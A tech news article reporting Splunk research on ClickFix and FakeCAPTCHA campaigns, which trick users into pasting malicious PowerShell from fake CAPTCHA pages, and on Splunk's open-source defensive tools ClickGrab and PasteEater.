A new report out today from big data company Splunk Inc. warns of a new trend in cybercrime: a surge in sophisticated social engineering campaigns that use fake CAPTCHA systems to deliver malware without relying on any traditional software vulnerabilities.

Dubbed “ClickFix” and “FakeCAPTCHA” attacks, these campaigns are designed to trick users into self-infecting their own system by exploiting their familiarity with everyday verification systems while leveraging clipboard manipulation techniques to deliver malicious payloads. Clipboard manipulation is a technique where malicious code silently copies harmful commands or data to a user’s clipboard, tricking them into pasting and executing it without realizing the danger.

The technique was first observed in early 2024 and now growing rapidly in 2025. The attacks evolved from basic scams to advanced techniques reportedly adopted by nation-state actors. Victims are lured to malicious websites, via phishing, malvertising or links on pirated software sites, where they are greeted with convincing replicas of Google LLC’s reCAPTCHA or Cloudflare Inc. CAPTCHA pages.

The fake pages then prompt users to click verification buttons that trigger hidden JavaScript, which silently copies PowerShell commands to the user’s clipboard.

The malicious code then instructs users to open the Windows Run dialog and paste the copied content, under the guise of performing an additional verification step. The commands usually then download and execute a second-stage payload using hidden PowerShell windows. It evades detection while installing credential-stealing malware or remote access trojans, such as Lumma Stealer, Redline or AsyncRAT.

The methodology that makes the attack so effective is its psychological precision. When a potential victim visits a malicious site, the interface feels familiar and trustworthy, the instructions are simple and the urgency is carefully manufactured. The deception hinges entirely on human behavior, not on exploiting a technical flaw.

To help defenders counter the threat, Splunk researchers have introduced two open-source tools: ClickGrab and PasteEater.

ClickGrab is a dual-mode analysis platform that uses Python and PowerShell to detect and dissect malicious websites deploying fake CAPTCHA systems. PasteEater offers real-time user protection by intercepting clipboard content before it’s executed.

In addition to the two new tools, Splunk has also published detection queries for its security platform to help organizations proactively monitor for FakeCAPTCHA activity.

“ClickFix and FakeCAPTCHA campaigns represent a sophisticated evolution in social engineering attacks, blending technical deception with human psychology,” said Splunk’s researchers. “While they may seem simplistic compared to advanced exploit chains, their effectiveness lies in exploiting the most vulnerable component of any security system: human trust.”

Image: SiliconANGLE/Reve